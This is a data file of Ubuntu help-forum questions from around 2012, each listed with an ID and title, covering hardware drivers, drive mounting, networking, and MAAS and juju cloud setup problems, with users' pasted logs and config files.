176413	amd radeon 5/6/7xxx passthrough for virtualbox in ubuntu 12.04	i installed virtualbox on ubuntu 12.04 derivative . as usual there is no direct graphics card support . i have an amd radeon 6790 ... can i access the resources of this card via any mechanism to give my windies 7 guest with gfx capabilities ... yes to play games etc .
176414	best packages for theme management	what are the best software packages in ubuntu that give me themes management ( installing , removing , editing ) in a easy way by gui ?
176417	unity-and other de-problems in 12.04	so , i installed 12.04 64-bit . i immediately had issues getting picasa 3 sync with web albums to work due to issues with wine ie6 and 64-bit . i decided it was n't worth it and decided to try out several de 's to determine what was best . i finally decided nothing worked better than unity for me and started attempting to uninstall kde and gnome shell . i used a prepared terminal command with a list of kde applications to uninstall kde . it did n't uninstall everything , such as kde settings . i then tried to uninstall gnome shell . it 's not only still in the list of log in options , but it 's still there . but when i try the command to remove it , it says it 's not there . not only that , but now unity 3d is borked . i get the desktop , but the top panel is missing and the panel on the left is missing . i 've tried re-installing unity , but it says it 's already there . i may end up installing 12.04 32-bit . i currently have only 3 gb of ram and since i 'm considering a new laptop before the end of the year , i may only upgrade to 4 gb . i do still have xfce and cinnamon installed if i need to uninstall/reinstall unity . thanks in advance for any help .
176418	skype video not working in 12.04	hi i have installed skype in ubuntu 12.04 and i am able to check video option in options / video devices.i am able to test video.but while making calls it could not display the video of me.please help me on this . even i have tried ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype to open skype from terminal
176422	mouse issue in wine	i 'm trying to run a fps game on wine called vicinity but once the game starts , i ca n't move the mouse and when i go to the menu the mouse works ( in the menu only ) . i searched but i did n't find a solution that works for me : ( i have the same problem with another fps game called offensivecombat . the mouse works in the menu but do n't in game . someone can help me please ? thank you in advance : )
176423	ubuntu 12.04 ibus 1.4.1 behavior	ibus behaves unstable , sometimes it does n't turn on languages ( i use korean and japanese ) , sometimes does n't detect input . version 1.4.1 , ubuntu 12.04
176425	how to open a terminal from the terminal	i 'm on ubuntu 12.04 and i use gnome terminal as my default terminal . i need to open another terminal from the command line . i know i can do this with gnome-terminal but i want to run a command that always opens the default terminal so that my script can run on other distros , even the ones not using gnome . edit : i want a bash script that opens the terminal .
176429	ca n't mount two external hard drives at the same time	this whole problem began a few months back when i tried to transfer data from my external hdd ( formatted to ntfs ) to a computer using windows 7 . while in ubuntu , there is about 1 tb worth of data ( important things which i would rather not lose ) , but when i tried to access those files from windows , they did n't show up after lots of googling and trying things , i did the following using a spare external hdd that i had ( same manufacturer , same capacity ) . formatted the spare drive to ext 4 transferred every file from old drive to spare drive . reformatted old drive to ntfs using gparted transferred some files on to the old drive to test if it works on windows , and it did . now the problem is , when i try plugging the old drive again in ubuntu , it does n't mount . i noticed this happens when the spare drive is already mounted . i have tried formatting the old drive to ext4 , fat32 and again in ntfs but no luck so far . i get this error message when trying to mount the spare drive with the old drive already mounted and a similar one when the drives are reversed : error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdc1 on /media/seagate external this is the result of trying to mount the drive via the terminal : sebastian @ ubuntu : ~ $ sudo mount /dev/sdc1 [ sudo ] password for sebastian : ntfs-3g : failed to access volume '/dev/sdc1 ' : no such file or directory ntfs-3g 2012.1.15ar.1 external fuse 28 - third generation ntfs driver configuration type 7 , xattrs are on , posix acls are on copyright ( c ) 2005-2007 yura pakhuchiy copyright ( c ) 2006-2009 szabolcs szakacsits copyright ( c ) 2007-2011 jean-pierre andre copyright ( c ) 2009 erik larsson usage : ntfs-3g [ -o option [ , ... ] ] < device|image_file > < mount_point > options : ro ( read-only mount ) , remove_hiberfile , uid= , gid= , umask= , fmask= , dmask= , streams_interface= . please see the details in the manual ( type : man ntfs-3g ) . example : ntfs-3g /dev/sda1 /mnt/windows news , support and information : http : //tuxera.com sebastian @ ubuntu : ~ $ sudo mount /dev/sdd1 the disk contains an unclean file system ( 0 , 0 ) . the file system was n't safely closed on windows . fixing . fuse : failed to access mountpoint /media/seagate external_ : no such file or directory this is the fstab , if it makes a difference : # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sdd1 /media/seagate\040external_ ntfs-3g defaults , nosuid , nodev , locale=en_us.utf-8 0 0 /dev/sdc1 /media/seagate\040external ntfs-3g defaults , nosuid , nodev , locale=en_us.utf-8 0 0 /dev/sdc1 /media/sdc1 ntfs-3g defaults , locale=en_us.utf-8 0 0 /dev/sdc2 /media/sdc2 ext4 defaults 0 0 /host/ubuntu/disks/root.disk / ext4 loop , errors=remount-ro 0 1 /host/ubuntu/disks/swap.disk none swap loop , sw 0 0 i should also mention that the old drive originally had a second partition of ~100 gb with nothing on it . any insights would be appreciated .
176433	xorg intermittently restarts after suspend	i have ubuntu 12.04 on a toshiba laptop . about one out of every three times , when waking from suspend , it wakes up normally and works for anywhere from 10-45 seconds , then the screen goes black , then it returns to the xwindows login screen , as if i had done sudo killall -9 xorg .
176437	how to set different wallpaper for each workspaces	i am running 12.04 and i ca n't have set different wallpaper for each workspaces i 've researched it for 2 days and i could n't even find a post about 12.04 tutorial for different wallpaper for each workspaces . i tried the ubuntu 11 way but it did not work , well , it wanted to me to locate to apps/natilus/prefrences and check off the show_desktop the problem is , i do not have that option . ( i have installed compiz manager , compiz plugins extra ) i tried using configuration editor and dconfig-editor well since i heard there 's no gconfig-editor for 12.04 ubuntu . i think i can do it alone if i can finally see that option `` show_desktop '' help please !
176442	can not reach any os ( operating system not found )	i know that there are several posts about operating system not found problem . but my situation is severe . my company will start to develop embedded systems on linux at the end of this year and i wanted to get familiar with linux . i wanted to install ubuntu 12.04 . first , ubuntu did not recognize windows partitions . i try to solve this problem ( i do not know and remember what i did here but i think this is the problem ) . after several hours i manage to install ubuntu on a 50 gb partition ( in fact i think that i successfully install ) . after rebooting the computer , i see the screen os not found . i realized that i can not install ubuntu properly and can not boot from windows 7 now . i use my windows 7 disk to repair windows 7 but installation can not see any harddisk partition and can not find anything to repair or re-install . i am in a desperate situation since my work on my work computer is about to get lost . my boss is not happy with that and give me time to solve this problem by the end of this day . please help ! ! ! ! ! ekrem .
176449	no such file or director in $ path	i wanted to be able to run program from anywhere without adding ./ , so i edited ~/.bashrc to contain this line export path= $ path : . now when i type echo $ path i get [ ... ... ] : /home/yotam/omnetpp-4.2.2/bin : . : no such file or directory why is that ? also , i 'm not sure about why using export , i get the same result if i just type path= $ path : more_valuew without export . so what 's the difference ? thanks !
176452	how to stream audio via x11rdp	how can i stream audio from ubuntu 12.04 server to wyse s10 terminals using x11rdp ? !
176454	ati hd missing driver on official site	can someone give me a hand with a hd 4650 sapphire driver ? i searched on the official site and this is what i get : amd catalyst™ driver for amd radeon™ hd 4000 , hd 3000 and hd 2000 series amd has moved to the amd radeon™ hd 4000 , amd radeon hd 3000 , and amd radeon hd 2000 series new driver support model. ( ... ) applicable products : this article applies to the following configuration ( s ) : hardware : amd radeon hd 4000 series / amd radeon hd 3000 series / amd radeon hd 2000 series / amd radeon hd series agp / amd mobility radeon hd 4000 series / amd mobility radeon hd 3000 series / amd mobility radeon hd 2000 series / and a link to a single driver : amd catalyst™ 12.6 proprietary linux x86 display driver ( automated installer and display drivers for x.org 6.7 , 6.8 , 6.9 , 7.0 , 7.1 , 7.2 , 7.3 , 7.4 , 7.5 , or 7.6 ) last time i installed this driver it gaved me some error ( ca n't remember what it was ) and i could n't install nothing no more due to some fglrx & dpgk error . any solutions ?
176468	juju bootstrap gives me a `` 409 conflict '' error	am defining a juju environment on ubuntu 12.04lts but when i give command `` juju bootstrap '' , it generates error i.e unexpected error interacting with provider : 409 conflict 2012-04-13 02:25:01,025 error unexpected error interacting with provider : 409 conflict my environments.yaml file is like : environments : maas : type : maas maas-server : 'http : //127.0.0.1:80/maas' maas-oauth : 'yqb6pzembfztlzgy9q:9tzqyqpcbag38vf5ph : eunhamh4lxrlj6wtburyqe9wrwcyjrhf' admin-secret : 'nothing' default-series : precise
176470	how to change the maas server ip address ?	i 'm experiencing maas using virtualbox . i had the maas server installed fine based on the wiki . the virtualbox vm has two network interfaces , eth0 for nat , eth1 for host only . the maas server picked eth0 , so i followed the wiki instruction to change the maas server ip address via the following command , sudo dpkg-reconfigure maas the https : //wiki.ubuntu.com/serverteam/maas instruction says `` you will be prompted for the correct ip address '' , but i did not get any prompt . i was able to manually edit /etc/cobbler/settings to change the `` server '' and `` next-server '' properties to point to the ip for eth1 . the added node was able to boot via pxe that leveraged the maas server ; however , at the end of the boot , the iscsistart is still trying to connect to ip for eth0 , hence , it failed to connect , since the dhcp is set to point to the ip for eth1 . can you help to point out 1 ) why i did n't get the prompt ? 2 ) how to manually change ip address setting for the iscsi ?
176473	how to get lexmark x2600 printer to work ?	if anyone can explain please can it be step by step ? i just got on here using ubuntu 12.04 and i just went and got a lexmark x2600 printer . i just wish it was as simple as windows , but no . this is the only printer that seems to not be in the search thing and i looked on here and these guys just seem to be talking in another world to me . please break it down to me , and what do i need to get or do ?
176474	hard-drive fails to boot if suspend was activated prior to restarting . booting a live usb/cd fixes the issue ( temporarily )	i am running 12.04 64-bit and am dual booting with win7 , for full disclosure , although i suspect that has nothing to do with my problem . the boot-loader ( grub ) fails to load often and i will be presented with a black screen with a single blinking line . this has happened to me eight out of ten power cycles now and i can fix it consistently , however , i have no idea why it happens . my current fix is to boot a live cd ( i 've tried both knoppix and ubuntu with the same result ) and that 's it . somehow booting with the live cd is enough to `` wake-up '' my hard drive . i then reboot and grub magically appears again . so what is going on ? is it possible that a program is corrupting my mbr and the live cd is restoring it ? how can i narrow down the possibilities ? thanks . additional this is still a problem . i 'm convinced now that it is not hardware related as i 've spent the last month and several boot cycles on windows without a hiccup . recently when i started using ubuntu again the problem started again . i am more interested in figuring out what is going on rather than actually fixing the problem . are there any tools , logs , etc . i can use to unravel this mystery ? update i can now consistently recreate the issue . it seems that if the computer is put into suspend mode at any point prior to restarting , the problem comes up . the computer goes into and out of suspend mode just fine but when i restart the system it fails to boot . i 've tried this command before and after suspending the computer : sudo hdparm -i /dev/sda > hdsettings.txt then i ran a diff on the two files and found that one thing changed : under security settings frozen changed to not frozen . i have no idea what that means but it 's a difference anyhow .
176480	limit the size of a directory by deleting old files	i have a ip cam which save its recordings in a specific directory named camera1 in my ubuntu server 12.04 . i would like to limit the size of this folder to 5 gigs , by deleting -say once a day- the oldest files . i first checked the quota program but it does n't seem to allow the creation of new files and deleting of the old ones . so i think the best workaround would be to run a bash script ? but i have no idea how to write it ... thank you guys !
176481	why ca n't i decommission maas nodes ?	i tried to set up a test cloud by following the tutorial here : https : //wiki.ubuntu.com/serverteam/maas i successfully set up the maas server and set it as a dhcp server . then i tried to add some nodes via the maas dashboard . i entered the mac addresses of 2 computers on the lan network and after a while i saw they had been added to the list of nodes with a status of `` commissioning '' . in the home page of the maas dash board it showed 2 nodes that were both offline . i have enabled wake-on-lan on both of the computers ( on the nic that i have connected to the lan of course , the nic i took the mac address from for each computer ) but they would n't boot so i tried booting them manually , one of the two computers showed me a list of what i suppose they are images , the other did n't . on the computer that did show the list i choose on of the images and it continued booting , at some point it hung while waiting for network connection . anyway i decided to remove the nodes from the maas server and try to recommission them using the installation usb/dvd but i found out i could n't remove them from the dashboard because they were `` commissioning '' , i tried to find a way to stop them from commissioning but i could n't so here i am , looking for help . actually , i just rechecked . the bios setting was boot from lan not wake on lan , scratch that . anyway , i booted them manually . the message is the same on one of the computers : begin : running /scripts/local-bottom ... done done begin : running /scripts/init-bottom ... success : root-ro successfully set up ro/tmpfs-rw layered root is using overlayfs done [ 9.663259 ] r8169 0000:01:08.0 : eth0 : link down [ 9.663605 ] addrconf ( netdev_up ) : eth0 : link is not ready ok , more info . the second computer ( the one that did n't show the list ) is ready . i checked the boot order and set the network card first and it worked . it now shows up as `` ready '' on the dashboard and i can start it from there , i have no idea however how to log in to my node if i want to , i never set any users or passwords . : s the other one now . if i choose local or maas-enlist on from the list , it starts a process similar to the installation of the ubuntu server ( looks for a network link , tries to autoconfigure ipv6 , successfully configures networking with dhcp ) and then starts loading additional components . at some point it says sending sigterm adn then sending sigkill to all processes and shuts down , if i restart it , the whole thing happens again . if i choose local , it tries to boot from the first hard drive which i suppose is what it should do , if i choose the i386 something option , the installation process starts regularly , if i wait , the same thing with maas-enlist happens . i forgot , if i choose the i386-commissioning option the eth0 thingy happens . nevermind , it was n't solved . here 's the current situation : computer 1 : everything ok , shown as ready in the node list , shown as queued on the main page . ca n't login on the node , do n't know credentials . computer 2 : i installed maas-precise-i386 , i can boot and it shows me `` maas-precise-i836 login : '' on the screen , node shown as `` commissioning '' in the node list , shown as offline on the main page .
176485	is disabling apparmor to solve permission issues when deploying maas advisable ?	i 'm still yet to successfully build a maas server , deploy nodes and charms with 12.04 lts . in my latest troubleshooting in my logs , i have found several errors in my syslog pertaining to permissions issues with apparmor . every time i would fix one , another would show up . i finally decided to disable apparmor with the following command : ln -s /etc/apparmor.d/usr.bin.cobblerd /etc/apparmor.d/disable/ apparmor_parser -r /etc/apparmor.d/usr.bin.cobblerd do you see any problems with doing this ? after apparmor was disabled , i was able to successfully run sudo cobbler check and got a message back saying all systems go .
176487	how to configue a dns server statically ?	i am setting up an ubuntu ( 12.04 ) server with a single statically-configured network interface . every time i reboot /etc/resolv.conf seems to get reset to empty . where can i put my dns server address ?
176489	what do i use for the pxe boot file for maas nodes ?	i 'm setting up maas and some nodes using vmfusion on macosx . i have built the maas server and 3 nodes , however they are not commissioning . my question is what do i use for the pxe boot file ? i 'm letting vmware handle the dhcp for my virtual subnet , and the config looks like this : subnet 192.168.221.0 netmask 255.255.255.0 { range 192.168.221.128 192.168.221.254 ; filename `` pxelinux.0 '' ; next-server 192.168.221.3 ; option broadcast-address 192.168.221.255 ; option domain-name-servers 192.168.221.2 ; option domain-name localdomain ; default-lease-time 1800 ; # default is 30 minutes max-lease-time 7200 ; # default is 2 hours option netbios-name-servers 192.168.221.2 ; option routers 192.168.221.2 ; i 've just guessed for the filename of the pxe bootfile , and i ca n't see where you document what to use . the nodes do boot into something , but they pause for a long time before going to the login prompt , and they never commision so that i am unable to complete the juju bootstrap- i just get : dillera @ maas3 : ~ $ juju bootstrap 2012-05-10 00:34:41,355 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... unexpected error interacting with provider : 409 conflict 2012-05-10 00:34:41,483 error unexpected error interacting with provider : 409 conflict so , what pxe boot file should i be using ?
176492	what do the various maas node statuses mean ?	i 'm interested in some more info on the different node state's the below link list some of the possible node status http : //people.canonical.com/~gavin/docs/lp : maas/enum.html # maasserver.models.node_status so from my understanding the pxe enlist gives you a declared node , then before you can use the node with juju you need to accept & commission , this gives you a commissioning state then after that the node become ready . my question is what is happening in the commissioning state ? does it need to boot the node ? does it install the os ? and do i need to bootstrap juju for the nodes to become ready or will successful commissioning move the node state to ready ?
176494	is it worth installing ubuntu instead of wubi ?	i 'm using wubi at the moment and my pc is really slow , is it worth deleting xp and formatting it to ubuntu ? or ( trying ) to reset xp to factory settings ? ps : i have over 40 gb hard drive and hate having xp on my computer ... thanks , dj porter
176498	what is the minimum number of nodes for an ubuntu cloud ?	what is the minimum number of nodes required to setup a functioning cloud as described in this tutorial : https : //help.ubuntu.com/community/ubuntucloudinfrastructure i just want to run some tests and i do n't have 10 computers lying around to do so . is it possible to use 2-3 nodes ( +1 for the maas server ) ?
176502	juju status returns error invalid ssh key	i was able to successfully juju bootstrap , but get an error with juju status . here is what i got the first time i ran it : please type 'yes ' or 'no ' : the authenticity of host 'node-003048c0cd2a.mydomain.com ( 172.16.1.71 ) ' ca n't be established . ecdsa key fingerprint is f8:02:18:7c:24 : b6:99:20 : cc : ab:29 : d0 : bc : c4 : d7:20 . are you sure you want to continue connecting ( yes/no ) ? yes 2012-05-22 05:55:55,411 error invalid ssh key 2012-05-22 05:56:24,390 error invalid ssh key 2012-05-22 05:56:54,623 error invalid ssh key before running bootstrap or status , i created my ssh keys and added the generated public key to the preferences of my user account on the maas ui . any ideas why i am getting this ssh error ? this error still occurs hours after the nodes install . i have not changed the names of any nodes , dns is correct , and i can ping the fqdn of the nodes in the web ui .
176504	how can i add packages , repositories , and users to all nodes ?	i 've installed maas and added 8 nodes with ubuntu server 12.04 amd64 . i would like to build a cluster with condor and centralized authentication with ldap . i 'm starting to think that maas was n't a good starting point , but maybe i can fix that . how can i add packages and repositories to all nodes ? is it by changing the .iso from maas server ? can i do that with juju ? how to add users and groups to the nodes ? how to change fstab on all nodes so it can use nfs ? can i also deploy a whole folder with a binary application ?
176507	why are my maas nodes stuck at the commissioning stage ?	i 'm attempting to set maas up on an older hp blade center . the nodes are stuck on commissioning . the nodes do pxe boot and seem to load ephemeral . they just never finish . as a test , i tried installing the regular lts server on one of the nodes . i received the message that `` some of your hardware needs non-free firmware to operate '' in particular , it 's calling for the tigon tg3 network driver firmware . could it be that maas is stuck for the same reason ? if so , how can i include or reference the tigon tg3 firmware in maas ?
176514	i want to block usb access in ubuntu 11.10 , i have tried it by some codes given before but not working	in my computer centre in my college ubuntu is installed for some projects purpose in order to keep safe from virus we would like to block pendrive access
176519	juju returns `` no matching node is available '' when trying to bootstrap a maas	this is my error while doing bootstrap , the status of nodes i added were declared and now i have accept and commising and it says comminsing started , i need help please .. clusteruser @ cluster : ~ $ juju status 2012-08-04 22:27:03,367 info connecting to environment ... 2012-08-04 22:27:04,945 error juju environment not found : is the environment bootstrapped ? clusteruser @ cluster : ~ $ juju bootstrap 2012-08-04 22:27:10,493 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... 2012-08-04 22:27:10,923 error no matching node is available . i am doing my work through vmware the way i am adding node is as follow 1- mount the cd iso image 2- boot to bios then select network boot 3-then proceed installation and node is added in declared 4- then i accept and commision and node status changes to commising state but how the status is changed to ready state ? i have 4 node added and none of them is in ready
176523	how can i make ubuntu mouse sensitivity exactly the same as in windows ?	i recently switched from windows to ubuntu . i 'm a heavy gamer of counter strike and mouse sensitivity is very important . is there any way of perfectly replicating windows mouse sensitivity settings ? i have gone through many forums and i 've only seen that useless tips are posted . i want to say that windows mouse setting of sensitivity is completely different from ubuntu . i need exactly the same sensitivity because though i play in my personal pc in ubuntu , i go lan parties where a windows os is installed . this causes some confusion between the sensitivity used at home and at lan parties , i.e the setting area is completely different and its almost impossible to find the perfect setting . if this problem is not solved , i would have no choice but to switch back to windows .
176524	maas nodes are enlisted but never show up	i am trying to get a private cloud running in a test environment with the use of virtual box , there have been a number of sites i have seen where this is a possibility . if this test is successful it 's a real possibility that my organization would deploy this in a true production environment . 5 - virtualbox vm 's ( i realize i will need to add two more nodes before i can truly use openstack , but i need one working node before i start anything else ... . servernames : server-maas1 ( maas master ) server-maas2 server-maas3 server-maas4 server-maas5 i have manually booted each vm node with 12.04 iso , and selected ubuntu with maas , followed the normal steps , and enlist with server-maas1 ( which it does discover server-maas1 ) once selected it sigkills and shutdowns . ( this i gathered is normal ) server-maas1 updates to display the node declared ( i have done this on the other 3 nodes as well ) so server-maas1 indicates i have 4 nodes , but never seen . i proceed to accept and commission each node , as well as change to wake-on-lan . note : i am not using maas-dhcp , as there is a dhcp server running on my current network . all nodes are in a `` commissioning '' state . none of the node detail pages contains a `` start node '' button to try to pxe boot these vms . all of these virtualbox vms are in fact using bridged adapter ( and promiscuous mode set to allow all , boot order indicates network boot first , adapter type ( intel pro/1000 mt desktop ( 82540em ) . at this stage i am pretty much stuck . so moving forward a few steps : juju is running on server-maas1 , here are the .juju/environments.yaml settings : evironments : maas : type : maas maas-server : 'http : //172.16.41.12:80/maas' maas-oauth : 'my api key' admin-secret : 'nothing' default-series : precise i get a 409 error after trying to bootstrap this . i assume this is a because of more than one reason . dns settings of some sort ? nodes are not working with maas correctly etc . i believe most of my problems are caused by not running maas-dhcp , but i do not have the luxury to run maas-dhcp on this environment . according to this https : //wiki.ubuntu.com/serverteam/maas , under the heading `` installation and initial set-up '' how you install and run maas depends largely on whether you have control of the network you 're using . in this guide , we 'll look at two common scenarios : you own the network : you own the network you 're connecting to and you 're happy to let maas own that network 's dhcp . you 're experimenting while using someone else 's network : you ca n't allow maas to own the network 's dhcp . we 'll look at both of these ways to run maas . well the `` you 're experimenting while using someone else 's network : '' is never explained . is this not an option right now ?
176526	set up different static ip addresses for different networks	i 'm relatively inexperienced with networking , but i know what i want to achieve in this case . i have a computer that i physically move between two separate local networks , but when the computer is on one of those networks i want to assign a different static ip address to the machine . one internal network is 192.168.1.0 , and the other is 192.168.2.0 . therefore , i want one static ip address to be 192.168.1.x and the other to be 192.168.2.x . is there a way of assigning two static ips , but with only one taking effect depending on the network its connected to ? can this be done purely in /etc/network/interfaces , for example ? i may well have misunderstood the situation , so if there 's a different way of achieving what i want then i 'm happy to hear the solution .
176527	how do i fix a `` could not resolve hostname '' error in juju status ?	i have my nodes in ready and one node in allocated to root stage , now when i bootstrap it gives success but when i do juju status it gives an error as below : juju bootstrap 2012-08-15 21:32:34,449 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... 2012-08-15 21:32:34,636 info juju environment previously bootstrapped . 2012-08-15 21:32:34,637 info 'bootstrap ' command finished successfully juju status 2012-08-15 21:33:17,833 info connecting to environment ... 2012-08-15 21:33:23,013 error invalid host for ssh forwarding : ssh : could not resolve hostname node-000c29d63ebb.local : name or service not known 2012-08-15 21:33:53,166 error invalid host for ssh forwarding : ssh : could not resolve hostname node-000c29d63ebb.local : name or service not known
176529	juju error : `` bootstrap aborted because file storage is not writable ... ''	i have added two nodes in my maas and they both are in ready state . i have also created the file `` environments.yaml '' and entered the following lines in this file environments : maas : type : maas maas-server : 'http : //192.168.216.129:80/maas' maas-oauth : ' $ { w8qsbnrnv9uzwa28rn : he6eddat92ntkdqced : ubrpgpbgpvthxk9zwnyj2egak6qs5qra } ' admin-secret : 'nothing' default-series : precise but after that when i entered the 'juju bootstrap ' command , i got the following error 2012-08-10 01:38:48,519 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... bootstrap aborted because file storage is not writable : the supplied storage credentials were not accepted by the server 2012-08-10 01:38:49,721 error bootstrap aborted because file storage is not writable : the supplied storage credentials were not accepted by the server
176541	fn keys trigger normal f keys	i 'm using xubuntu 12.04 , my fn keys work , but when i press them system/apps react to the function keys bindings too e.g . if i press fn+f11 to lower the volume my browser goes full screen ... can i change this behaviour in any way ?
176542	flash games performance are slower after fresh install ?	i installed 12.04 a week ago and everything was working smoothly : flash was working fine , i could watch html5 videos etc . last night i was trying to install w8 on the same machine . well that did n't work out ( that 's a different story ) so i reinstalled 12.04 . now all of a sudden i 'm having two separate problems : flash games are slow and choppy , one in particular , outernauts on facebook , used to work fine and now it does n't load at all ; html5 videos are only playing at fast forward speed . now , i successfully fixed my issues with html5 using this fix , but i ca n't figure out how to make flash run as well as before ( i tried this with no noticeable change ) . i have no additional drivers installed and everything is updated . i wonder if something got messed up in the new install or some recent update is causing some problem . i 'm certainly confused about how a fresh install will behave in two completely different ways in such a specific thing .
176543	clone 320gb hardrive	can i clone 320gb hardrive with ubuntu installed onto a 8gb pendrive . i have installed ubuntu on 320gb hardrive , with several packages installed . my toltal installation size if only 500mb . can i make a image of this to restore it later .
176544	sony nwz-e363 does n't go in mtp-mode	i want my mp3-player to work as mtp . therefore i added a .config containing options usb-storage quirks=054c:059b : i file to /etc/modprobe.d . to prevent the device from beeing auto-mounted . furthermore i installed mtp-tools libmtp-runtime libmtp9 libmtp-dev libmtp-dbg from the reps. then i rebootet , plugged in the device . it did n't get mounted but was displayed with lsusb , so i tried mtp-detect : $ mtp-detect libmtp version : 1.1.3 listing raw device ( s ) no raw devices found . ( same with sudo ) so i copied the the 69-libmtp.rules from the latest libmtp-package on sourceforge to /etc/udev/rules.d and added the lines # sony nwz-e363 attr { idvendor } == '' 054c '' , attr { idproduct } == '' 059b '' , symlink+= '' libmtp- % k '' , env { id_mtp_device } = '' 1 '' , env { id_media_player } = '' 1 '' after that i rebootet again and i tried mtp-detect again . but without any success .
176550	is it possible to change the file-system of usb without loosing data and without taking backup ?	as the subject says , can i change the file-system of a usb ( or say any drive ) from it 's current partition like : - ext4 to a different partition like : - ext2/fat/ext3/ntfs file-system without loosing the data in the drive and without taking backup .
176554	how do i bind each of my server 's nic 's to a separate ip ?	my question is `` how do i bind each of my server 's nic 's to a separate ip ? '' my ubuntu 12.04 server has two nic 's - both are attached to my home lan . the nic 's have device names that were set in /etc/udev/rules.d/70-persistent-net.rules . i have called the lan0 and lan1 . ( see below for my 70-persistent-net.rules ) . each nic acquires correctly its ip settings via dhcp from my router . the assignment of ip is done based on the mac of the dhcp request . lan0 is assigned ip 172.23.80.1 whilst lan1 is assigned 172.23.80.2 . ( see below for ifconfig output and my /etc/network/interfaces ) . my problem is that when i connect via ssh from a separate computer i always receive the connection from the same server mac irrespective of the ip that i used in the ssh call . let me describe the following experiment that shows my problem . i use three terminals ( term1 , term2 and term3 ) on my ubuntu desktop computer term1 : arp -n address hwtype hwaddress flags mask iface 172.16.0.1 ether 00:50:7f:9d:2d:30 c wlan0 172.23.80.1 ( incomplete ) wlan0 term2 : ssh me @ 172.23.80.1 me @ 172.23.80.1 's password : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-generic-pae i686 ) * documentation : https : //help.ubuntu.com/ last login : thu aug 16 12:37:48 2012 from 172.23.128.11 me @ fermi : ~ $ term1 : arp -n address hwtype hwaddress flags mask iface 172.16.0.1 ether 00:50:7f:9d:2d:30 c wlan0 172.23.80.1 ether 00:0d:61:22:3d : d6 c wlan0 term3 : ssh me @ 172.23.80.2 me @ 172.23.80.2 's password : welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-generic-pae i686 ) * documentation : https : //help.ubuntu.com/ last login : thu aug 16 13:37:12 2012 from 172.23.128.11 me @ fermi : ~ $ term1 : arp -n address hwtype hwaddress flags mask iface 172.23.80.2 ether 00:0d:61:22:3d : d6 c wlan0 172.16.0.1 ether 00:50:7f:9d:2d:30 c wlan0 172.23.80.1 ether 00:0d:61:22:3d : d6 c wlan0 as you can see from this last arp both ssh connections are being serviced by a single nic on the server even though the two ip 's have been assigned to different nics . this is my problem . here is my server configuration : me @ fermi : ~ $ ifconfig lan0 link encap : ethernet hwaddr 00:0d:61:22:3d : d6 inet addr:172.23.80.1 bcast:172.31.255.255 mask:255.240.0.0 up broadcast running multicast mtu:1500 metric:1 rx packets:1452 errors:0 dropped:0 overruns:0 frame:0 tx packets:496 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:113691 ( 113.6 kb ) tx bytes:72934 ( 72.9 kb ) lan1 link encap : ethernet hwaddr 00:19:5b:68:93:57 inet addr:172.23.80.2 bcast:172.31.255.255 mask:255.240.0.0 up broadcast running multicast mtu:1500 metric:1 rx packets:1103 errors:0 dropped:0 overruns:0 frame:0 tx packets:2 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:85747 ( 85.7 kb ) tx bytes:684 ( 684.0 b ) interrupt:22 base address:0x9000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:16436 metric:1 rx packets:14 errors:0 dropped:0 overruns:0 frame:0 tx packets:14 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:700 ( 700.0 b ) tx bytes:700 ( 700.0 b ) me @ fermi : ~ $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto lan0 iface lan0 inet dhcp auto lan1 iface lan1 inet dhcp me @ fermi : ~ $ cat /etc/udev/rules.d/70-persistent-net.rules # this file was automatically generated by the /lib/udev/write_net_rules # program , run by the persistent-net-generator.rules rules file . # # you can modify it , as long as you keep each rule on a single # line , and change only the value of the name= key . # pci device 0x1186 : /sys/devices/pci0000:00/0000:00:1e.0/0000:03:02.0 ( sundance ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:19:5b:68:93:57 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' lan1 '' # pci device 0x8086 : /sys/devices/pci0000:00/0000:00:03.0/0000:02:01.0 ( e1000 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:0d:61:22:3d : d6 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' lan0 '' me @ fermi : ~ $ route kernel ip routing table destination gateway genmask flags metric ref use iface default ohm.universe 0.0.0.0 ug 100 0 0 lan0 172.16.0.0 * 255.240.0.0 u 0 0 0 lan0 172.16.0.0 * 255.240.0.0 u 0 0 0 lan1 me @ fermi : ~ $ cat /proc/sys/net/ipv4/ip_forward 0 me @ fermi : ~ $ arp -n address hwtype hwaddress flags mask iface 172.23.128.11 ether 00:18 : de:02 : f0:5c c lan0 172.16.0.1 ether 00:50:7f:9d:2d:30 c lan0 me @ fermi : ~ $ sudo ufw status status : inactive
176565	why does kworker cpu usage get so high ?	i recently installed ubuntu 12.04 on my samsung laptop alongside windows 7 . whenever i use ubuntu ( even when its idle ) kworker uses almost 90 % of one of 8-cores . even though it does n't really affect my usage , it bugs me and i am afraid of that it might harm my processor . i even tried installing another linux distro ( linux mint ) , and kworker caused the same problem . so i do n't know what to do . i would really appreciate your help .
176568	i686 cpu detected when trying to install an from an x86-64 live cd	ok so when i put the live cds in my pc it boots then displays ' this kernel required an x86-64 cpu , but only detected a i686 cpu . unable to boot- please use a kernel appropriate for your cpu. ' is it because i 'm ripping the iso downloaded from a win 7 on to a cd then sticking it in a win xp ?
